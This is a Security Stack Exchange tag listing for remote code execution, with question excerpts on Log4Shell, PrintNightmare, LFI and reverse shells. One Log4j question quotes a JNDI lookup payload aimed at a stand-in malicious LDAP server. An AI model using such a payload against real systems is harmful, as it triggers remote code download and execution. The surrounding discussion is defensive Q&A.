IT Security Stack Exchange
IT Security Stack Exchange

Questions tagged [remote-code-execution]

Remote code execution is the process of running arbitrary code on a device over some type of network. The code can either be malicious, such as a code injection on a website, or voluntary, such as with Java Remote Method Invocation.

Remote code execution is the process of running arbitrary code on a device over some type of network. A specific instance of arbitrary code execution, but done on a remote system.

The code does not need to be malicious, as there are technologies that facilitate executing code remotely on a system, such as Java's Remote Method Invocation.

One can argue that any type of access call to a service or website results in remote code execution, but its rarely referred to as that.

40 questions
68
votes
1 answer

Unusual mail headers show evidence of MTA attack. Have I been pwned?

Today I found an extremely unusual email in my catchall inbox, without subject, sender or content. My Gmail client for android reported the mail was sent by me, triggering a nuclear alert in my mind. I had fear that someone had guessed my robust…
usr-local-ΕΨΗΕΛΩΝ
  • 5,310
  • 2
  • 17
  • 35
9
votes
2 answers

Who is at risk from the PrintNightmare RCE?

Microsoft released an emergency patch and stated that the vulnerability is being actively exploited in the wild. All the news articles describing the RCE are implying that any internet-connected computer running Windows is at risk. This can't…
Atte Juvonen
  • 440
  • 1
  • 4
  • 10
4
votes
1 answer

Does the log4j RCE vulnerability run even if the message is just a part of the logged string?

Does the JNDI URL need to be the full string being logged or could it be just a part of a logged string? For example, if the code contains: paramGivenFromOutside = "${jndi:ldap://maliciousServer:1389/maliciousApp}"; logger.debug("Request: {}",…
Lefteris E
  • 143
  • 2
3
votes
1 answer

Can one protect from the Log4j exp by sanitizing the parameters?

A zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) was made public on December 9, 2021 that results in remote code execution (RCE). (From an email CloudFlare sent to users) Is a site susceptible to the Log4J exploit if…
gordon613
  • 271
  • 2
  • 7
3
votes
1 answer

Is this a remote code execution vulnerability?

I am planning to evaluate and install a publicly available software. https://github.com/opensemanticsearch/open-semantic-search While reviewing the issues on github, there is an issue open which indicates possible remote code execution for Solr with…
Stacky
  • 133
  • 4
2
votes
2 answers

Is there any way an attacker can access the server and modify the site (php) code?

I recently had a breach on my site (laravel). I got aware of it after I tried to pull the code from github and found out that some files were modified. The files modified were mostly storage - logs/cache and index.php had error_reporting(E_ALL) in…
php.prg
  • 21
  • 3
2
votes
4 answers

LFI php://input returning initial argument?

TLDR: Trying to execute commands on site thats got a LFI vuln. So I am making my post request to my vulnerable site and import requests header = { 'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201', …
RFIx
  • 21
  • 2
2
votes
2 answers

Why is the first step for an attacker to get Reverse Shell after getting RCE?

If someone is having a Remote Code Execution, that means, one can run the commands on the server, then why does he need to get the Reverse Shell? Even though I can run system commands, then why do I go for Reverse Shell? I am finding the primary…
AWS Learning
  • 31
  • 4
2
votes
1 answer

Dangers of Electron's "shell.openExternal" on untrusted content

I'm curious about the actual dangers of executing shell.openExternal on untrusted content. Documentation specifically states that this can be leveraged for RCE: Improper use of openExternal can be leveraged to compromise the user's host. When…
Mala
  • 123
  • 5
2
votes
2 answers

Are alphanumeric strings safe to pass to a bash script?

I'm currently developing a web service that takes user input and passes it to a bash script as an argument. I know that without sanitizing this allows for remote command execution. So I want to know if alphanumeric strings with hyphens are safe to…
limeeattack
  • 62
  • 5
2
votes
2 answers

Remote code execution over WAN

Say I am on a a computer behind a NAT and I want to execute an RCE exploit on another computer behind a different NAT(note that no ports are forwarded to the victim's computer on his/her NAT) Could I then run an exploit like this(assuming that I…
Bzzzz..
  • 21
  • 2
2
votes
0 answers

Reverse TCP - Bind to a specific port

So, I'm trying to solve a CTF challenge that involves exploiting a remote service. The service doesn't check for the size of the input and there is a buffer overflow vulnerability. However, before I can hijack the control flow to my shellcode, the…
Ranganatha Rao
  • 121
  • 1
1
vote
1 answer

New York Times article about FBI secretly removing malware from U.S. corporate servers - would this indicate they have a government backdoor?

New York times just ran an article titled "U.S. Says It Secretly Removed Malware Worldwide, Pre-empting Russian Cyberattacks" that stated The United States said on Wednesday that it had secretly removed malware from computer networks around the…
alec
  • 135
  • 4
1
vote
0 answers

RCE through specifying .NET type or namespace?

I'm testing an application that allows the user to provide an XML file that will be processed. (I've already tried typical XML attacks, such as XXE.) One of the elements of the XML file allows the user to specify a .NET type that will loaded by the…
Bob
  • 79
  • 7
1
vote
1 answer

Log4shell - Should affected servers be "nuked from the orbit"?

Considering how log4shell seems trivial to exploit and the important control level it gives to an attacker, should we wipe everything affected and start over? For example, we find out that a publicly accessible server in production has log4j…
pmbonneau
  • 161
  • 2
  • 2
  • 10
1
2 3